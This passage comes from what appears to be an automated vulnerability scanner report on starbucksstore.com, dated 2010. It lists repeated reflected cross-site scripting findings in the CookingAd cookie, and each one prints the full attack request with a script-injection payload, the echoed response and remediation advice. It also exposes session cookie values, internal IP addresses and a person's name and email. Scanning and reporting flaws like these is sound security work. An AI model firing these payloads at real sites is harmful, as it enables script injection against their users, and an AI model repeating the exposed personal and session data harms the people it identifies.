Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBea760</script><script>alert(1)</script>6b70b264755;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29705
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:52 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>
       <title>Coffee at Starbucks Store</title>
       <meta name="description" content="Shop for Coffee at Starbucks Store">
       <meta name="keywords" content="Coffee, Sta
...[SNIP]...
s_pageName="Coffee HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Coffee HomePage"
   var s_prop3="SBPTPAHP1SHTBEA760</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6B70B264755"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_sta
...[SNIP]...

3.76. http://www.starbucksstore.com/coffee-machines [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c32</script><script>alert(1)</script>953da364365 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee-machines HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB76c32</script><script>alert(1)</script>953da364365;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21134
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:59 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
eName="Equipment Homepage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Equipment Homepage"
   var s_prop3="SBPTPAHP1SHTB76C32</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>953DA364365"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee-machines/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.77. http://www.starbucksstore.com/coffee-machines/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da449</script><script>alert(1)</script>9e10653ba75 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee-machines/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBda449</script><script>alert(1)</script>9e10653ba75;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21134
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:23 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
eName="Equipment Homepage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Equipment Homepage"
   var s_prop3="SBPTPAHP1SHTBDA449</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9E10653BA75"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee-machines/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.78. http://www.starbucksstore.com/default.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /default.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8163c</script><script>alert(1)</script>ec3893ac889 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8163c</script><script>alert(1)</script>ec3893ac889;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:50 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTB8163C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>EC3893AC889"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.79. http://www.starbucksstore.com/entertainment [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /entertainment

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdb1e</script><script>alert(1)</script>221b4ee20e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entertainment HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBcdb1e</script><script>alert(1)</script>221b4ee20e3;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16383
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:01 GMT
Connection: close

<!--S1--><!--S0-->    
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" conte
...[SNIP]...
rbucks Entertainment"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Entertainment"
   var s_prop3="SBPTPAHP1SHTBCDB1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>221B4EE20E3"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/entertainment/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.80. http://www.starbucksstore.com/entertainment/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /entertainment/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 687ff</script><script>alert(1)</script>a3b2dc7f084 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entertainment/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB687ff</script><script>alert(1)</script>a3b2dc7f084;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16383
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:12 GMT
Connection: close

<!--S1--><!--S0-->    
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" conte
...[SNIP]...
rbucks Entertainment"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Entertainment"
   var s_prop3="SBPTPAHP1SHTB687FF</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A3B2DC7F084"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/entertainment/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.81. http://www.starbucksstore.com/extras/newsletters.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /extras/newsletters.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b33f</script><script>alert(1)</script>b422eca8919 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /extras/newsletters.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2b33f</script><script>alert(1)</script>b422eca8919;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16365
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:14 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ame="/extras/newsletters.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/extras/newsletters.asp"
   var s_prop3="SBPTPAHP1SHTB2B33F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B422ECA8919"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/extras/newsletters.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s
...[SNIP]...

3.82. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/ga_faq_shipop.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c1e</script><script>alert(1)</script>c2c9791a405 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/ga_faq_shipop.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB30c1e</script><script>alert(1)</script>c2c9791a405;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42766
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:31 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ist/ga_faq_shipop.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/ga_faq_shipop.asp"
   var s_prop3="SBPTPAHP1SHTB30C1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C2C9791A405"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/ga_faq_shipop.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
...[SNIP]...

3.83. http://www.starbucksstore.com/guestassist/gareturns.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/gareturns.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de33</script><script>alert(1)</script>0be688d889d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/gareturns.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1de33</script><script>alert(1)</script>0be688d889d;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15086
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:32 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
guestassist/gareturns.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/gareturns.asp"
   var s_prop3="SBPTPAHP1SHTB1DE33</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0BE688D889D"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/gareturns.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.84. http://www.starbucksstore.com/guestassist/shcontus.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a945e</script><script>alert(1)</script>f60d28581e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/shcontus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBa945e</script><script>alert(1)</script>f60d28581e3;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20651
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:23 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
"/guestassist/shcontus.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shcontus.asp"
   var s_prop3="SBPTPAHP1SHTBA945E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F60D28581E3"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shcontus.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var
...[SNIP]...

3.85. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaemailconfirm.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78a7c</script><script>alert(1)</script>702f5512ffc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /guestassist/shgaemailconfirm.asp HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Referer: http://www.starbucksstore.com/guestassist/shgaform.asp
Cache-Control: max-age=0
Origin: http://www.starbucksstore.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect78a7c</script><script>alert(1)</script>702f5512ffc; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=Direct; SITESERVER=Version=1%2E0&ID=AC3A5C5B95534FDD921B69406EFD3A13; ASPSESSIONIDCABCBCAB=HFGLDLCBGCDBDIJEHPIPCKKA; __utmz=9087863.1289934824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1312787331-1289934823813; ASPSESSIONIDACACCDBA=POGLDLCBAAAEGEBIMPBBLEID; s_cc=true; __utma=9087863.993059575.1289934824.1289934824.1289934824.1; __utmc=9087863; __utmb=9087863.2.10.1289934824; s_sq=cookstarbucksstore%3D%2526pid%253D/guestassist/shgaform.asp%2526pidt%253D1%2526oid%253Dhttp%25253A//iweb.starbucksstore.com//images/starbucks/btn_submit2.gif%2526ot%253DIMAGE
Content-Length: 628

txtFirstName=Hoyt&txtMidInitial=&txtLastName=LLC&txtEMailAddress=h02332%40gmail.com&cboSubTopics=5&txtareaMessage=Hello+and+Good+Day-%0D%0A%0D%0AHoyt+LLC+from+David%2C+Ma..+this+is+David..%0D%0A2+issu
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12638
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCDCCADA=FDGBELCBEJODMBJCBCCHOEDB; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:43:09 GMT

<!--S1--><!--S0-->
   

<!-- Common Function include file -->

<!-- EMail include file -->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HT
...[SNIP]...
st/shgaemailconfirm.asp"
   var s_setRef=""
   var s_server="10.11.5.101"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shgaemailconfirm.asp"
   var s_prop3="SBDIRECT78A7C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>702F5512FFC"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shgaemailconfirm.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=
...[SNIP]...

3.86. http://www.starbucksstore.com/guestassist/shgaform.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaform.asp

Issue detail

